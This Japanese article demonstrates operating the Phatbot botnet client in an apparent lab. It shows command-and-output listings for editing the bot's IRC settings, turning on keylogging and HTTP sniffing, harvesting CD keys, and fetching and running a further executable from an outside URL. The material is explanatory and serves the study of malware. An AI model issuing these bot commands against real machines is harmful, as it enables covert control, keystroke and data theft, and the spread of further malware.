RSS Feed  Twitter  
|
Articles - Malware
 
Agobot系を使ってみる
今回は、Agobot系の亜種「Phatbot」を利用した例を示す。ボットの場合、基本的にやりたいことは同じであるため、DDoSアタックや脆弱性スキャン、システム操作など、Phatbotでもrbot系と同様の操作が可能になっている。
 
設定の確認と編集
 
Agobot系では、前述したようにコマンドリストを表示させ、どのような操作を行うかを確認できるとともに、現在のボットの設定を確認したり編集することができるコマンドも備わっている。
 
■図26:設定確認、編集コマンドで、現在の設定をチェックして不要な機能をオフにしたりといったこともできる。
 .cvar.list ←設定の確認
-[ cvar list ]-
1. / "bot_ftrans_port" / "27861" / "Bot - File Transfer Port"
2. / "bot_ftrans_port_ftp" / "12501" / "Bot - File Transfer Port for FTP"
3. / "si_chanpass" / "" / "Server Info - Channel Password"
4. / "si_mainchan" / "#hack" / "Server Info - Main Channel"
5. / "si_nickprefix" / "bleh-" / "Server Info - Nickname prefix"
6. / "si_port" / "6667" / "Server Info - Server Port"
7. / "si_server" / "192.168.1.88" / "Server Info - Server Address"
8. / "si_servpass" / "" / "Server Info - Server Password"
9. / "si_usessl" / "false" / "Server Info - Use SSL ?"
~~~~省略~~~~
.cvar.set do_speedtest "true" ←スピードテスト機能をオンにする
do_speedtest = "true" (was "false")
.cvar.saveconfig ←設定を保存する
Successfully saved config...

キーロガー、スニッファ機能
 
キーロガーやスニッファは予め設定をオンにしておけば、出力先のチャンネルにアクティブウィンドウ名とともにリアルタイムで表示される。たとえば、図はグーグルで「hackerjapan」というキーワードを検索した際の出力である。同様にしてスニッファ機能も指定したチャンネルにリアルタイムで出力される。
 
■図27:設定でキーロガー、スニッファ機能などを有効にしてあれば、リアルタイムで結果がチャンネルに出力される。上がキーロガー、下がスニッファの出力だ。
 (Google - Microsoft Internet Explorer)  hackerjapan (Return)
HTTP sniff "66.249.89.104:80" to "192.168.1.21:1128": - "HTTP/1.1 200 OK  Content-Type: text/css  Last-Modified: Mon, 25 Apr 2005 21:04:27 GMT  Set-Cookie: PREF=ID=4a6131c8fa0e112f:TM=1143157969:LM=1143157969:S=ty1b83edAhWU_aiA; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.google.com  Content-Encoding: gzip  Server: GWS/2.1  Cache-Control: private, x-gzip-ok=""  Content-Length: 208  Date: Thu, 23 Mar 2006 23:52:49 GMT    ・"
 
システム情報の閲覧、操作
 
基本のシステム情報の閲覧から、プロセスの操作、サービスの追加・削除、レジストリのスタートアップ登録、CDkeyの閲覧などが可能になっており、ボットのアップデートだけでなく、新たなマルウェアやサーバアプリケーションなどを追加したりプログラムの起動もできる。
 
■図28:システム情報やプロセスの閲覧など、基本的な操作が可能。
 .bot.sysinfo ←システム基本情報の閲覧
cpu: 1000MHz ram: 357MB/510MB os: XP [Service Pack 2] up: 0d 1h 20m box: GX150 freespace: C:16581MB
.bot.about ←Botのバージョン確認
NortonBot (St0neyBot) "Release" on "Win32"
.bot.secure ←ファイル共有の削除とDCOMの無効化
Bot Secured
.pctrl.list ←プロセスの閲覧(KILLもできる)
-[ process list ]-
1. / Pid: 332 / "\SystemRoot\System32\smss.exe"
2. / Pid: 416 / "\??\C:\WINDOWS\system32\winlogon.exe"
3. / Pid: 624 / "C:\WINDOWS\system32\services.exe"
4. / Pid: 636 / "C:\WINDOWS\system32\lsass.exe"
5. / Pid: 796 / "C:\WINDOWS\system32\svchost.exe"
~~~~省略~~~~
.harvest.cdkeys ←CDKeyの取得
[Windows Product ID: 0xxxx-OEM-00xxxxx-00xxx]
 ※新たなexeファイルを指定したURLよりダウンロードして実行させる。更なるマルウェアを投入できる。
 .http.execute http://www.blackout.org/misc/sv.exe %TEMP%\hacker.exe
Receiving file.
download to C:\DOCUME~1\user\LOCALS~1\Temp\hacker.exe finished.
opened C:\DOCUME~1\user\LOCALS~1\Temp\hacker.exe.